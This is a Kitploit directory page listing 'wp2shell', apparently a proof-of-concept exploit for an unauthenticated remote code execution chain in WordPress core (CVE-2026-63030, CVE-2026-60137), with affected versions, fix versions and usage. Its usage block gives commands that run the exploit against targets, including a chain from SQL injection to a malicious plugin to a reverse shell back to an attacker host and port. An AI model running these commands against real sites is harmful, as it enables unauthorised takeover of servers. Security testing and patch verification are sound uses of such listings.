Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-63030 — PoC Exploit of WordPress Core Unauthenticated RCE known as WP2Shell | Kitploit
Tools/GitHubGitHub/mverschu/cve-2026-63030
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmverschu/cve-2026-63030

CVE-2026-63030

PoC Exploit of WordPress Core Unauthenticated RCE known as WP2Shell

View Repository
41111 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Namewp2shell
CVEsCVE-2026-63030 (batch desync), CVE-2026-60137 (author__not_in SQLi)
AffectedWordPress 6.9.0 to 6.9.4, 7.0.0 to 7.0.1
Fixed in6.9.5, 7.0.2
Auth neededNone
Found byAdam Kues (Searchlight Cyber / Assetnote)

Usage

Bare host = auto scheme (tries https:// then http://). Prefix with http:// or https:// only when you want to force one.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
FlagWhat it does
--shell [LHOST [LPORT]]stock RCE chain; default LHOST is this box's IP, LPORT is 443
--rest-routetry /?rest_route=/batch/v1 first
--verify-tlsverify TLS certs (off by default for lab/self-signed)
--proxy URLsend traffic through a proxy
--forceskip WordPress fingerprinting
Download Tool